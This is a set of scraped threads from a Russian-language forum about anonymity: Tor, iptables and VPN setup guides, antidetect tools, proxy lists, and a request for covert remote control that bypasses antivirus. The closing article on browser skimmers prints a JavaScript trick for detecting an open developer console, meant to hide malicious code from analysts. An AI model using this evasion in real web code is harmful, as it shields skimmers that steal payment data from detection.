Делаем простую анонимную ОС на базе Ubuntu. Почему все такие ленивые и ни кто не хочет все сделать сам. И быть уверенным что это реально работает как надо.

1. Ставим Ubuntu
2. Ставим tor

apt-get install tor

Click to expand...

apt-get install polipo

Click to expand...

нужно для проксификации socks5 в http, так как стандартное окружение не может работать через socks5.

3. Настраиваем окружение

Конфиг polipo

logSyslog = false
logFile = /var/log/polipo/polipo.log
allowedClients = 127.0.0.1 #, 192.168.1.0/24 # Expose your network (modify accordingly)
socksParentProxy = "localhost:9050"
socksProxyType = socks5
proxyAddress = "127.0.0.1" # IPv4 only

Click to expand...

Идем в глобальные настройки прокси в оболочке и указываем как прокси его стандартный порт 127.0.0.1:8123
Радуемся, теперь почти весь наш софт юзает прокси. Браузер хром подтягивает настройки автоматом. Ну и весь остальной.

Теперь главная особенность которую я заметил. Если поставить firefox, он по дефолту не ходит через тор. Но это нам на руку. Мы берем ставим на него плагины, включая foxy proxy. Так как хромиуме врядли кто-то адекватный сидит. Насраиваем правила. На onion сайты ходить через прокси и + маски для каких сайтов использовать маски. Да да, не забывает отключать всякие WebRTC, JS и так далее.

Список плагинов который я юзаю это: ghostery, agent spoofer, foxy proxy, adblock plus, https everywhere, noscripts

Покупаем любой впн и натягиваем его. Теперь фаерфокс у нас юзает по дефолту впн, а если встречает правила то идет через тор. Настраиваем, плагин agent spoofer и очистку всех данных при закрытии. Вот вам аналог и тор браузера , который ни чего и не хранит.

4. Настраиваем смену айпи по времени

Идем в crontab и задаем правило

*/30 * * * * /etc/init.d/tor restart

Click to expand...

B вот мы каждые 30 минут меняем цепочку для работы.

Очень важно, если в tor добавить порт форвардинг, он перестает работать как демон и его нужно использовать к примеру через screen. ну это уже детальная настройка.

5. Ну для всяких параноиков, можно еще поставить Virtual Box с любой виртуальной операционной системой, которая будет полностью завернута в тор

apt-get install virtualbox

Click to expand...

Пишем в конфиге тора

VirtualAddrNetwork 10.192.0.0/10
AutomapHostsOnResolve 1
TransPort 9040
TransListenAddress 172.16.0.1
DNSPort 53
DNSListenAddress 172.16.0.1

Click to expand...

Ставим dnsmasq

apt-get install dnsmasq

Click to expand...

Добавляем в конфиг

interface=vnet0
dhcp-range=172.16.0.2,172.16.0.254,1

Click to expand...

Создаем скрип bash для перезапуска всего этого добра

#!/bin/sh

/etc/init.d/dnsmasq restart
/etc/init.d/tor stop
killall -9 tor

httpd proxy restart

/etc/init.d/polipo restart

destinations you don\\'t want routed through Tor

NON_TOR="192.168.1.0/24"

Tor\\'s TransPort

TRANS_PORT="9040"

your internal interface

INT_IF="vnet0"

iptables -F
iptables -t nat -F

for NET in $NON_TOR; do
iptables -t nat -A PREROUTING -i $INT_IF -d $NET -j RETURN
done
iptables -t nat -A PREROUTING -i $INT_IF -p udp --dport 53 -j REDIRECT --to-ports 53
iptables -t nat -A PREROUTING -i $INT_IF -p tcp --syn -j REDIRECT --to- ports $TRANS_PORT

#iptables -I INPUT -i wlp4s0 -p icmp -j DROP

echo "nameserver 8.8.8.8" > /etc/resolv.conf

screen -dmS tor tor

Click to expand...

Далее этот скрипт можно тоже засунуть в crontab по правилам выше и все)

Теперь у нас есть интерфейс который весь трафик пускает в тор. его можно юзать как хочешь. Идев в виртуал бокс и создаем виртуальную машину и в сетевых интерфейсах указываем этот наш vnet0

Ура весь траф там идет теперь через тор, а внутри можно настраивать как угодно.

Если у кого-то есть вопросы, пишите в жабу, отвечу всем) Спасибо за внимание. Это впринципе будет работать на любою линукс подобной системе, может чуток отличаться по конфигам. Предлогайте вопросы, или предложения, обязательно допишу мануал)

Настройка бесплатного антидетекта

ID: 676533bbb4103b69df371d97
Thread ID: 26165
Created: 2018-10-03T11:38:04+0000
Last Post: 2018-10-25T19:15:30+0000
Author: tabac
Prefix: Видео
Replies: 1 Views: 3K

Видео 1. Устанавливаем антидетект, добавляем сертификаты, переводим в тестовый режим
http://youtube.com/watch?v=niF637sMjaw

Видео 2. Настраиваем гостевую систему, ставим гостевые дополнения.
http://youtube.com/watch?v=lPqrVzAWb-c

Создание VPN + шифрование ?

ID: 676533bbb4103b69df371db5
Thread ID: 21840
Created: 2011-06-24T04:48:41+0000
Last Post: 2013-03-20T09:55:48+0000
Author: D3fault
Replies: 17 Views: 3K

Хотелось бы узнать как поднять VPN на дедике, какой софт нужен. Читал на античате вот эту статью, дак вот не понятно будет ли шифроватся канал, и если да то каким ключом ? Вообщем мне надо поднять VPN на дедике с длиной ключа в 2048 бит. И вот за одним ещё вопрос - а правда что если VPN с длиной ключа 2048 бит то провайдер не узнает даже о подключении ? Мне кажется это бред
Спасибо, жду ответов.

TrueCrypt c ключевым файлом на рутокен

ID: 676533bbb4103b69df371db9
Thread ID: 22072
Created: 2011-08-09T07:38:02+0000
Last Post: 2012-02-18T13:50:42+0000
Author: Ar3s
Replies: 8 Views: 3K

Чем больше мы используем компьютер и чем больше он входит в нашу жизнь, тем чаще мы начинаем задумываться о безопасности хранимой информации на нем. Не говоря уже о предприятиях, когда проблемы в безопасности хранимой информации могут привести к большим потерям.

В данной публикации я расскажу как можно создать в системе виртуальный зашифрованный диск, для доступа к которому необходим ключевой файл, который размещается на рутокене.

TrueCrypt — это программной обеспечение, позволяющее создавать виртуальный зашифрованный логический диск, хранящийся в файловой системе как файл. Все записываемые данные на этот диск, включая имена файлов и каталогов «шифруются на лету». Так же существуют возможность полностью зашифровать разделы жесткого диска или usb носителя. Смонтированный раздел идентичен обычному логическому диску или съемному накопителю, что дает возможность работать с ним всеми утилитами встроенными в операционную систему, таких как проверка диска и дефрагментация.

Рутокен – это устройство выполненное в виде usb-брелока, которое служит для авторизации пользователя на компьютере, защиты данных, безопасного удаленного доступа к информационным ресурсам и т.д.

Нам потребуются

дистрибутив TrueCrypt — http://www.truecrypt.org/downloads
русский перевод — http://www.truecrypt.org/localizations
рутокен — http://www.rutoken.ru/products/rutoken/
драйвера для Рутокена — http://www.rutoken.ru/hotline/download/

Устанавливаем TrueCrypt и драйвер для рутокен

Как рекомендуют разработчики рутокен, нельзя его подключать, пока не установлены драйвера. Процедура установки не отличается от установки любого приложения. На все вопросы отвечаем положительно и принимаем условия лицензионного соглашения. Распаковываем файл перевода TrueCrypt в папку, куда он был установлен. Запускаем TrueCrypt и в настройках изменяем язык на русский – Settings\Language, выбираем Русский и ОК.

Подключаем рутокен к usb порту

После подключения в TrueCrypt запускаем «Настройки токена безопасности» — Сервиc\Токены безопасности, в открывшемся окне запускаем «Автоопределение библиотеки». При успешном поиске путь к библиотеке автоматически заполниться, далее ОК.image

Создаем ключевой файл

Теперь нам необходимо создать ключевой файл. Для этого открываем «Генератор ключевых файлов» — Сервис\Генератор ключевых файлов. Перед нами генерация ключа. image
Чтобы сохранить ключевой файл нажимаем «Создать и сохранить файл», выбираем путь и сохраняем ключевой файл. Нас оповестят об успешном сохранении ключа.

Запись ключа на рутокен

Все готово, чтобы ключ записать на рутокен — Сервис\Ключевые файлы токена безопасности. Должен появится запрос пароля Рутокена(если его не появилось, видимо библиотека не была указана), вводим пароль пользователя рутокен (по умолчанию 12345678). В открывшемся окне нажимаем «Импорт кл. файла в токен», указываем ключевой файл, который мы генерировали в предыдущем пункте, а после указываем как он будет называться на рутокене.
При успешном добавлении он появится в списке с именем, которое Вы указали.
image
Если Вы планируете пользоваться ключом только с рутокена, то необходимо удалить сохраненный на компьютере ключ.

Теперь рутокен полностью готов для работы с TrueCrypt, можно создавать зашифрованный том.

Создаем зашифрованный том

ВНИМАНИЕ! Все дальнейшие необдуманные действия с Вашей стороны со своим жестким диском на Ваш страх и риск! Я описываю самый безопасный способ создания скрытого раздела. Если не хотите потерять данные, придерживайтесь инструкции.

Для создания нового тома используем мастер создания томов TrueCrypt – Тома\Создать новый раздел.
Запускается «Мастер создания томов TrueCrypt». Выбираем «Создать зашифрованный файловый контейнер», т.е. виртуальный зашифрованный диск будет храниться в одной файле.

Тип тома «Обычный том».

Выбираем где у Вас будет храниться файл диска. Если поставить галочку напротив «Не сохранять историю», то Вам придется каждый раз указывать месторасположения файла.

В настройках шифрования Вам необходимо указать алгоритм шифрования, который будет использоваться для шифрования создаваемого диска. У каждого алгоритма своя скорость работы, чтобы просмотреть скорость шифрования\дешифрования для всех алгоритмов, нажмите «тест».

Теперь Вам необходимо ввести размер создаваемого тома.

Пришло время указать ключевой файл и пароль. Нажимаем «Ключ.файлы», если там нету вашего ключа, то в этом окне нажимаем «Токен-файлы», вводим пароль рутокена и выбираем токен.

Переходим далее, где уже нам необходимо указать опции (файловая система, кластер и тип файла: динамический или статический) и разметить наш будущий диск. Разметка занимает некоторое время, чем больше размер тома, тем дольше он будет размечаться.

По окончании процесса Вас уведомят что том был успешно создан.

Монтируем созданный том

В главном окне TrueCrypt нажимаем «Файл», выбираем файл тома и нажимаем «Смонтировать».
Если у Вас не подключен рутокен, то вы получите ошибку «Ключевой файл токена безопасности не обнаружен». Подключаете рутокен, если он не подключен. Нажимаем «Ключ.файлы» и выбираем рутокен ключ.

Если пароль был введен правильно, а рутокен был подключен и выбран необходимый ключ, то вы увидите смонтированный новый диск. Удачной работы!

Важно! Когда монтирование диска произошло, рутокен необходимо отключить от usb порта, так советуют сами разработчики, чтобы продлить ему жизнь. От себя еще советую настроить автоматическое размонтирование при не активности.

В следующей части расскажу как сделать тоже самое, но уже на операционной системе Linux.

Источник
p.s. статья скопипащена т.к. может быть полезной и может вызвать альтернативные, более дешевые, предложения.

А есть ли возможность юзать Java через соксы?

ID: 676533bbb4103b69df371dc3
Thread ID: 18923
Created: 2010-01-27T14:09:41+0000
Last Post: 2010-06-14T16:14:54+0000
Author: z01k
Replies: 6 Views: 3K

Первое что приходит в голову, при работе на ВМ на хост машине у себя поднять впн или прокси, который будет ходить в инет через соксы, и через него ходить.
Я в правильном направлении думаю?
Какие инструменты для этого посоветуете?

ProxyGrab v0.6

ID: 676533bbb4103b69df371dc4
Thread ID: 19498
Created: 2010-05-19T14:06:11+0000
Last Post: 2010-06-03T02:38:41+0000
Author: ammok
Replies: 5 Views: 3K

ProxyGrab v0.6

Может кому пригодиться...

:zns5: Скачать|Download

Как обезопасить себя без VPN

ID: 676533bbb4103b69df371dc5
Thread ID: 18955
Created: 2010-01-31T05:01:45+0000
Last Post: 2010-05-14T08:28:50+0000
Author: CardMoney_
Replies: 7 Views: 3K

SSH тунель позволяет создать шифрованый канал между локальным компом и сервером. Через этот канал можно пропускать любые сетевые сервисы. Чтобы сконфигурировать SSH клиент PUTTY необходимо:

- ввести имя хоста с открытым шелом
- на вкладке Tunnels под Connection/SSH пишем Source Port 31337 и ставим галку Dynamic

Теперь соединяемся с сервером и получаем на 127.0.0.1:31337 SOCKS5 готовый к работе!

Файлы к мини-статье:
- лучший SSH клиент http://webfile.ru/4264549

Dangerous IP ranges

ID: 676533bbb4103b69df371dc9
Thread ID: 18841
Created: 2010-01-15T09:15:01+0000
Last Post: 2010-01-16T14:47:59+0000
Author: Darkmist
Replies: 7 Views: 3K

наткнулся на статью в которой люди обсуждали опасные диапазоны....
насколько это правда ?? и опасно???

Если информация верна давайте поделимся инофрмацией об этих диапазонах :help:

Elite VPN Service ver.2 - Гарант Вашей Безопасност

ID: 676533bbb4103b69df371dca
Thread ID: 18100
Created: 2009-08-05T16:07:37+0000
Last Post: 2009-12-15T13:34:55+0000
Author: Metall2
Replies: 6 Views: 3K

Мы рады сообщить о реинкарнации легендарного сервиса!

Наш сервис предоставляет услуги Elite уровня с 2004 года, сервис прошел множество проверок.

Основные преимущества нашего сервиса:
- Управление подпиской осуществляется в автоматическом режиме на нашем сайте.
- Шифрация трафка 128бит PPtP и 2048бит OpenVPN
- Ведение логов полностью отсутствует.
- Наша уникальная серия подписок Elite Double VPN
- Возможность использования своих личных VPN серверов в связке с нашими.

Ликбез: Elite Double VPN
Данная уникальная серия подписок включает в себя точку входа (обычно в Евро зоне с высокой скорость) а на выходе абсолютно все сервера нашего сервиса!
Таким образом вы получаете максимально защищенный VPN с возможностью изменить точку выхода (Ваш IP) в любой момент, просто переподключившись на другую подписку!
Между серверами входа и выхода поднят шифрованный тунель.
!!!Сервера входа не имееют выхода в мир, мы считаем это критическое ошибкой в предоставлении Double VPN, наши сервера имееют связь только с исходящими серверами.

Подписка: Luxembourg - All Servers включает:

Luxembourg - Netherlands
Luxembourg - USA
Luxembourg - Germany
Luxembourg - United Kingdom

Подписка: Netherlands - All Servers включает:

Netherlands - Luxembourg
Netherlands - USA
Netherlands - Germany
Netherlands - United Kingdom

В стандартном режиме доступны и обычный VPN в таких странах:
Luxembourg
Netherlands
USA
Germany
United Kingdom

Немного о нашем сервисе:
- Мы всегда поддерживаем наши сервера и связки для их стабильной работы, используем транзитные сервера, поэтому наш сервис немного дороже конкурентов.
- Все сервера подключены на 100/1000мб каналах
- Наши сервера расположены на одном из самых стабильных и высокоскоростных дата центров (суммарный канал 1.2 гигабита)
- Мы не используем стандартных решений, наше ПО основано на измененном коде.
- Только у нас Вы получите стабильный и надежный сервис.

Подробней:
VPN-Service.us
ICQ# 100720 - Финансовые вопросы
ICQ# 100761 - Техническая поддержка

SocsCap V2 / FreeCap одна проблема

ID: 676533bbb4103b69df371dcc
Thread ID: 18044
Created: 2009-07-30T16:35:20+0000
Last Post: 2009-07-31T16:31:41+0000
Author: NMY
Replies: 4 Views: 3K

Здраствуйте Гуру кибермира.

У меня появилась проблема - немогу нечего запустить с помощю SocksCap v2 или freeCap. Выдает ошыбку application error - bla.bla.bla The memory could not be "read". bla. press ok...

ОС win xp sp3

Может это изза дров т.к. я на лаптопе? DELL Latitude 100l

Удаленное управление локальной машиной

ID: 676533bbb4103b69df371dd5
Thread ID: 17363
Created: 2009-04-11T10:16:09+0000
Last Post: 2009-04-12T14:12:54+0000
Author: lisa99
Replies: 8 Views: 3K

Большая просьба подсказать, как лучше управлять машиной из внешней сети, если локальный комп (не сервер) под NAT-ом?
Есть возможность поставить любое ПО и подавить все авиры.
Наверняка, все уже давно решено, и тема хорошо описана в разных местах. Посоветуйте, где лучше всего почитать подробности..и вообще, в какую сторону лучше смотреть...

Анонимайзеры

ID: 676533bbb4103b69df371ddb
Thread ID: 15307
Created: 2008-07-31T11:23:45+0000
Last Post: 2008-07-31T11:23:45+0000
Author: Noctambulaar
Replies: 0 Views: 3K

Приступим:

Code:Copy to clipboard

http://anonymouse.org
http://proxy.org
http://www.bigstorm.info
http://noctambulaar.ru/file/anonym.php
http://helpwithalgebra.info
http://proxya.ru/
http://anonymizer.nntime.com/
http://www.anony-surf.com/index.php
http://www.guardster.com
http://skweezer.net
http://www.smartproxy.net/
http://x-sec.info
http://helpwithcalculus.info
http://www.udor.org/home.php
http://helpwithchemistry.info
http://anonymizer.name/
http://playstar.freehostia.com/ 
http://helpwithenglish.info
http://www.farmfresh.us/
http://www.theproxy.be/
http://www.proxyweb.net/
http://www.w3privacy.com/
http://www.hongkongproxy.com/
http://www.cibasoftlenses.info/
http://www.proxy-gratuit.fr/
http://www.guyfreedom.info/
http://www.callmenigga.info/
http://www.merletn.org/
http://www.sipifi.com/proxy/index.php
http://www.pass2class.info
http://www.proxypages.net/
http://cheatyourschool.com
http://yourhotproxy.com
http://www.plzdontblock.us
http://www.surfyproxy.com/
http://proxy.skrabby.com/
http://surf.007wood.insanegb.com
http://www.freewebsitepro.com
http://www.dirproxy.net
http://myspaceproxe.info
http://proxyhound.info
http://amlt.net
http://uxfr.com
http://www.ip-shield.info/
http://lovemyproxy.info
http://www.8-29.com/
http://www.bnperu.com
http://qxfr.com
http://freesurf22.info
http://pazzip.com
http://www.surfvid.info
http://bazsho.info
http://kizzom.com
http://joooom.com
http://divoxo.com
http://proxy89.info
http://filterpass.info
http://freesurf11.info
http://iranproxy.ws
http://schoolproxy99.info
http://zokkop.com
http://doopax.com
http://axxozo.com
http://www.turnbacktube.com
http://proxys.6x.to/
http://gixxop.com
http://www.hoboproxy.com
http://myfreshproxy.info
http://wegito.com
http://nobos.info
http://UnblockYouTube.com
http://surfatwork.info
http://proxy62.com
http://proxaholic.com
http://www.skenk.com
http://www.greekshare.gr
http://www.easy2tube.com
http://www.piingus.info
http://www.piingschool.info
http://www.SPOILER123.com
http://best100proxies.com/proxy
http://proxy.iandron.cn
http://www.bluemask.info
http://baxxoo.com
http://tezzoo.com
http://loveproxy.proxysplit.com
http://surfi.info
http://zekurf.com
http://sunblocked.info
http://geelax.com
http://diningdough.info
http://knotist.com
http://knotologist.com
http://www.AlienUnblocker.info
http://www.LetzSurf.info
http://www.MySpaceWebProxy.info
http://www.MySpaceX.info
http://www.SSurf.info
http://www.SkyPrxy.info
http://www.XiOi.info
http://www.WebPrxy.info
http://www.UnblockSiteProxy.info
http://www.PublicProxyServer.net
http://www.schoolsurfing.net
http://www.yoursproxy.com
http://www.3sixty5.net
http://www.anewproxy.com
http://www.hiddenip.biz
http://www.mixgoogly.com
http://www.looker.in
http://www.proxin.cn
http://www.webmask.info
http://www.breakthefirewall.com
http://www.cloaka.info
http://www.cloakb.info
http://www.cloaki.info
http://www.cloakh.info
http://www.cloakg.info
http://www.cloakf.info
http://www.cloake.info
http://www.cloakd.info
http://www.cloakj.info
http://www.cloakk.info
http://www.cloakl.info
http://www.cloakm.info
http://www.cloakc.info
http://www.cloakproxy.info
http://www.cloakinferno.info
http://www.proxyware.info
http://www.icansee.info
http://www.webconceal.info
http://www.webSPOILER.info
http://www.tipproxy.info
http://www.zipproxy.info
http://www.cloakfire.info
http://www.proxycorp.info
http://www.cloakflame.info
http://www.cloakflare.info
http://www.cloaktorch.info
http://www.cloakblaze.info
http://www.uk-prock-see.info
http://www.filtermyspace.com
http://www.webevade.info
http://www.cloakn.info
http://www.cloako.info
http://www.cloakw.info
http://www.cloakx.info
http://www.cloaky.info
http://www.cloakz.info
http://iamhidden.info
http://proxygerm.info
http://rudeproxy.com
http://justunblock.us
http://letzsurf.info
http://www.cloakt.info
http://www.cloakp.info
http://www.cloakq.info
http://www.cloakr.info
http://www.cloaku.info
http://www.cloakv.info
http://exopass.com/
http://surfunblocked.com/
http://kosurf.com/
http://puteng.info
http://hancus.info
http://hampeh.info
http://hohoh.info
http://merdeng.info
http://babir.info
http://ngaum.info
http://heyya.info
http://kambem.info
http://canigetin.info

сорц анонимайзера poxy-0.5b2: >>>
так же http://noctambulaar.ru/file/anonym.txt

Переменные окружения

ID: 676533bbb4103b69df371de1
Thread ID: 13412
Created: 2006-11-07T19:09:13+0000
Last Post: 2006-11-08T12:37:52+0000
Author: hawk2000
Replies: 2 Views: 3K

Переменные окружения

Определение : Информация, передаваемая клиентом серверу, доступна для сервера в виде так называемых переменных окружения (environment variables). Каждая единица этой информации является значением какой-либо переменной. Если же какая-то часть информации не передается, то соответствующая ей переменная будет пустая (ее значение будет неопределенным).

Список основных переменных окружения и небольшие комментарии.
**
DOCUMENT_ROOT** Корневой каталог документов веб-сервера. Например, если при запросе http://www.my-web-server.ru/ сервер пересылает посетителю файл d:/www/index.html, значением переменной DOCUMENT_ROOT будет d:/www. Это обычно совпадает с тем, что указано в директиве DocumentRoot конфигурационного файла сервера Apache.

CONTENT_LENGTH Длина тела запроса. Обычно это поле анализируют, если получен запрос типа POST.
**
CONTENT_TYPE** Тип принятых данных. Например, multipart/form-data.
**
GATEWAY_INTERFACE** Имя и версия CGI-протокола. Например: CGI/1.1. Эта переменная может оказаться полезной, чтобы определить, откуда запущена программа. Если значение переменной отсутствует, то программа, скорее всего, вызвана не через веб, а запущена из командной строки на сервере.

HTTP_ACCEPT Список mime-типов, которые способен принять браузер.
Переменная может содержать только маску /, либо список значений, разделенных запятыми: text/html, image/png, image/jpeg, image/gif, image/x-xbitmap, application/msword.

HTTP_ACCEPT_CHARSET Список воспринимаемых браузером кодировок. Например, windows-1251;q=1.0, utf-8;q=1.0, utf-16;q=1.0, iso-8859-1;q=0.6, *;q=0.1. Обратите внимание, что после каждой кодировки указан ее «вес», который расставляет кодировки в порядке предпочтения.

HTTP_ACCEPT_ENCODING Список типов кодирования, которые понимает браузер. Например: gzip, deflate, x-gzip.

HTTP_ACCEPT_LANGUAGE Список языков, которые принимает браузер. Например: ru, en.

HTTP_CACHE_CONTROL Способ кэширования документов (или указание о его отсутствии). Например: no-cache. В ранних версиях Netscape Navigator это значение доступно в переменной HTTP_PRAGMA.

HTTP_CONNECTION Тип соединения. Например: Keep-Alive.

HTTP_COOKIE Список пар вида имя=значение, содержащихся в cookiе для текущей страницы или сервера. Значения cookie устанавливает веб-сервер, а браузер клиента сохраняет их и передает серверу при следующих запросах, ведущих на тот же сервер.

HTTP_HOST Запрошенное доменное имя. Часто бывает так, что один и тот же сервер доступен по нескольким адресам, например, http://www.my-web-server.ru и http://my-web-server.ru. Переменная примет значения www.my-web-server.ru и my-web-server.ru, соответственно. Переменную можно использовать, чтобы автоматически перенаправлять браузер на другой адрес, например, если вы приобрели новое, более красивое, доменное имя.

HTTP_REFERER Адрес страницы, с которой пользователь попал на сервер. Например, если на странице http://www.web-server-1.ru/index.html стоит ссылка на ресурс http://www.web-server-2.ru/index.html, то второй веб-сервер получит в этой переменной значение http://www.web-server-1.ru/index.html. С помощью переменной HTTP_REFERER можно узнать, кто ссылается на ваш сервер. Более того, если посетитель пришел с поисковой системы, часто в переменной виден тот запрос, по которому вас нашли.
**
HTTP_USER_AGENT** Идентификатор клиентской программы (браузера) и операционной системы. Значение этой переменной не стандартизировано и формируется браузером так, что в ней содержится имя и версия браузера одновременно с версией операционной системы. Например, Microsoft Internet Explorer 6.0 под управлением Windоws XP передает такую строку: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705).

QUERY_STRING Строка запроса. Если пользователь запросил документ и указал дополнительные параметры, например, <http://www.my-web- server.ru/index.html?var1=name1>, переменная получит значение var1=name. Эта переменная активно применяется при обработке веб-форм.
**
REDIRECT_QUERY_STRING** Эта и две следующие переменные появляются в том случае, если при запросе некоего ресурса веб-сервер выполнил внутреннее перенаправление, например, на скрипт, который указан в качестве индексного файла для текущего каталога, либо при вызове CGI-программы директивой SSI. В переменной REDIRECT_QUERY_STING содержатся те же данные, что и в переменной QUERY_STRING.
**
REDIRECT_STATUS** При перенаправлении в этой переменной указан код ответа, например, 200.
**
REDIRECT_URL** Если на сервере выполнено перенаправление, эта переменная содержит запрошенный URI.

REMOTE_ADDR IP-адрес пользователя. В том случае, если между пользователем и веб-сервером находится прокси-сервер, переменная скорее всего будет содержать адрес прокси-сервера.

REMOTE_HOST Имя узла пользователя или его прокси-сервера. Если эта переменная не установлена, можно воспользоваться значением переменной REMOTE_ADDR.

REMOTE_PORT Номер порта клиента. Если на машине клиента одновременно работают несколько браузеров, значение этой переменной окажется различной для каждого из них. Интересно отметить, что, например, устаревший ныне браузер Netscape Navigator 2 увеличивает номер порта при каждом обновлении страницы.

REQUEST_METHOD Текущий метод HTTP-запроса. Например: GET или HEAD.

REQUEST_URI URI запрошенного документа. Понятие URI часто путают с URL. Если запрошена страница http://www.my-web-server.ru/dir/index.html, переменная примет значение /dir/index.html. Если в запросе содержится строка запроса (помещаемая в переменную QUERY_STRING), она останется и в переменной REQUEST_URI.

SCRIPT_FILENAME Путь к скрипту на веб-сервере. Переменная устанавливается, если пользователь запросил CGI-скрипт или программу, а не html-документ. Например: d:/www/cgi/2/c2.exe.

SCRIPT_NAME URI скрипта, если запрошен CGI-скрипт или программа, а не html-документ. В отличие от переменной REQUEST_URI, строка запроса теряется.

SERVER_ADDR IP-адрес веб-сервера.

SERVER_ADMIN Адрес электронной почты администратора сервера. Значение переменной зависит от того, что указано в файле конфигурации.
**
SERVER_NAME** Имя сервера. Оно может не совпадать с доменным именем. Значение этой переменной указано в конфигурационном файле.

SERVER_PORT Номер порта веб-сервера, по которому он ожидает запросы. Наиболее вероятное значение — 80.
**
SERVER_PROTOCOL** Имя и версия протокола, согласно которому веб-сервер общается с клиентом. Например: HTTP/1.1.
**
SERVER_SOFTWARE** Название и версия веб-сервера. Здесь также может содержаться упоминание об операционной системе. Например: Apache/1.3.14 (Win32).

Материалы взяты с сайтов freeproxy.ru и webcode.ru

Браузерная безопасность и личные данные

ID: 676533bbb4103b69df371cc0
Thread ID: 39071
Created: 2020-06-30T00:48:37+0000
Last Post: 2020-07-10T22:20:59+0000
Author: Bill
Prefix: Статья
Replies: 8 Views: 3K

Данную статью планировал написать немногим позже, но по скольку она уже лежала готовая в текстовом файлике и тут платят за откровения, а это именно то что я искал
К тому-же статья является следствием того, что "не прошло и года, за то прошла половина" и [единственная АВ компания с 3ей статьи](https://blog.malwarebytes.com/threat-analysis/2020/06/web-skimmer- hides-within-exif-metadata-exfiltrates-credit-cards-via-image-files/) именно по теме favicon (стоило на экспе подкинуть идейку - и моментально все начали делать глупые пародии на саму идею, от чего появились две статьи предшественницы с разбором попыток каких-то ноунеймов с экспа очевидно, а время жизни моего решения заметно увеличилось в следствии того, что эксперты видимо не ожидали такой версии реализации подмены favicon.ico.
Цитата из статьи: " The abuse of image headers to hide malicious code is [not new](https://blog.sucuri.net/2013/07/malware-hidden-inside-jpg-exif- headers.html), but this is the first time we witnessed it with a credit card skimmer. "
критика в сторону писавшего пост: его удивил не обход запретов браузера на подобные трюки, а то, что трюк применён именно впервые для выполнения скиммера. Это ведь абсолютно не имеет значения? То что подобное используют соц.сети для слежения и аналитики личных данных пользователей - это видимо норма, а эксплуатация коллапса системы безопасности который не решить никак, кроме как переделав все наново - тоже не проблема для писавшего пост. Либо он не разбирается в сути дела, либо, не уловил её. Что еще забавней, он делает отсылку к посту где exif тянется на PHP - что по сути является пустышкой и ничем примечательным не является. А вот то что было сделано до полной работоспособности и дискредитации понятия "политика безопасности" написанном на чистом JS без использования каких либо библиотек - это как по мне трудно превзойти, но, один способ есть, в его корнях уже совсем другие проблемы тех же браузеров, и к ним я еще вернусь в следующей статье.

Статья-обзор основных проблем веб-безопасности и способов их решений и на уровне админов, и на уровне тех, кто лишь использует то что им преподносят.

Пожалуй главная тема завязана на том, что браузер как хранитель многих личных данных, так-же обладает и огромным функционалом благодаря сочетанию всего 2х крайне неуравновешенных и незащищенных технологий: HTML и JS.
Оказалось, что большинство браузеров буквально профилировано под скрытое слежение:
- Скрытые хранилища данных
- Абсолютное отсутствие возможности ограничить внутри HTML доступ к тем или иным данным вводимых форм
- JS превыше всего, а политика безопасности превыше JS. Итого: все баги аккумулируются вокруг политики безопасности вокруг ДОПОЛНИТЕЛЬНОГО языка JS. Напоминаю: JS - это лишь дополнение для браузеров, а не основа веб-вёрстки и тут кроется беда: почему JS в работе с данными главнее, а доступ к данным буквально никак не прописан в спецификации стандартов HTML, HTTP/2.0 ... Еще раз и коротко: HTML - должен быть главнее, тогда все проблемы безопасности канут в небытие.

You must spend at least 7 day(s) on the forum to view the content.

Пример Проблемы said:

Есть интернет-магазин, на котором клиенты вводят свои личные данные. Проблема в том, что эти данные легко улетают с помощью JS.

Click to expand...

Решение said:

Ввести атрибут для полей (input, select, radio, textarea e.t.c.) запрещающий чтение данных из поля для JS.

Click to expand...

Обход решения said:

Подмена "action" параметра отправляемой формы на прокси сохраняющий и ретранслирующий данные на оригинал

Click to expand...

Решение обхода said:

Еще один атрибут запрещающий изменение тех или иных базовых параметров HTML тегов для JS

Click to expand...

Таким образом, ограничив JS возможностью указать в HTML-полях запреты - мы возвращаем роль "главного" туда, где этой роли и место.
В качестве примера попробуйте обдумать для себя и такой

Пример Проблемы said:

Кейлогер на JS не возможен ровно до тех пор, пока не установишь программно бинды на все клавиши и следуя за мышкой создавать вечно активное поле куда эти данные будут попадать.

Click to expand...

Попробуйте придумать решение под данную задачу, не затронув при этом сегмент интернета с браузерными играми и прочими интерактивными забинженными скриптами.

Сегодня же я постараюсь коротко разобрать процесс понимания и создания скрипта способного сразу на 3 опасные для всех браузеров функции:
- скрытое получение и выполнение кода замаскированным под медиа-данные
- возможность препятствовать отладке процесса, не давая выполняться коду при открытой консоли. Причем важно: чтобы детект консоли работал вне зависимости от настройки "положения окна".
- полностью безграничный доступ к данным, который ничем не перекроить, и не ограничить. И что хуже: даже специальные хранилища для данных: LocalStorage как самый популярный вариант.

Причем касательно хранилищ данных у меня есть все основания полагать что они нужны только авторам браузеров, чтобы их трекеры, фингерпринтеры и прочие аналитики обрели специальное место для отработки данных, причем именно максимально в удалении от пользователя.

Начну пожалуй с консоли, ведь это буквально то первое решение что пришло ко мне спустя 30 минут гугла и попыток методом тыка. 99% решений работают либо не во всех браузерах, либо с багами, либо не отрабатывают при условиях типа открытой консоли в отдельном окне (поймете если будете гуглить и попадёте [сюда](https://stackoverflow.com/questions/7798748/find-out-whether-chrome- console-is-open)).

---level DEVTOOLS = > 15 min of GOOGLE---

Code:Copy to clipboard

var element = new Image();
Object.defineProperty(element, 'id', {
  get: function () {
    alert('囧');
  }
});
console.log('%cHello', element);

Никакое другое не работает везде, и при любых условиях, причём - при минимально возможном количестве знаков. Причем как Вы видите - снова JS и его "пронзательность" ничем не ограниченная на всех уровнях - позволяют этому коду работать.
Принцип работы кода: создать объект "Картинка", задать свойство с целевым кодом внутри (к примеру изменение статуса переменной "открытая консоль" на "закрытая" и дальнейшая LIVE-отработка именно с этой переменной, безо всяких проблем, и на конец: вывод этого объекта с заданным свойством в консоль. И если консоль открыта - объект будет вызван, по скольку для вывода его в консоли он должен вызваться. Если консоль закрыта - то вывод в неё не станет причиной вызова объекта и соответственно выполнения кода внутри заданного свойства. На самом деле данный код можно улучшить как минимум в 3х пунктах, но, предполагаю те кому надо - разберутся.

И к сожалению решение этой проблемы как по мне не существует. Разве что ограничить работу свойства объектов на предмет возможности выводить их в консоль (или если и выводить - то без передачи информации про вызов именно для функции вывода в консоль). Хотя и эту защиту можно обойти, но это уже целая другая статья

---level DEVTOOLS = > busted---

